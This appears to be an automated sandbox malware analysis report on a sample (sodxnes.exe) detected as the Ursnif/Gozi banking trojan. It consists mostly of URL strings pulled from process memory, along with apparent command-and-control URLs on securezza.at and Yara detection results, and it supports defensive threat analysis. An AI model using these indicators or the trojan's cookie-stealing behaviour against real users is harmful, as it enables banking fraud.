Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmpString found in binary or memory: http://securezza.at/images/n58fjtZhTCpMhOny/d_2F5nDeAbVbALK/_2FYd0KZgbPGjaCEmW/loCUkF_2F/0E54l0
Source: explorer.exe, 00000014.00000000.1287822496.05D16000.00000004.00000001.sdmpString found in binary or memory: http://securezza.at/images/n58fjtZhTCpMhOny/d_2F5nDeAbVbALK/_2FYd0KZgbPGjaCEmW/loCUkF_2F/0E54l0KaY43
Source: explorer.exe, 00000014.00000000.1276986093.0087D000.00000004.00000020.sdmpString found in binary or memory: http://securezza.at/images/vt6G1XeymRxjyw99/uJu1Co0NCp8XDAF/A4EL32Pwn0gFTMv5l3/bFOIqzhKU/lZjwIJqkCLP
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000014.00000000.1282169755.03A10000.00000008.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000014.00000000.1278404490.01ED0000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\ProgramData\sodxnes.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 2_2_05601B0F
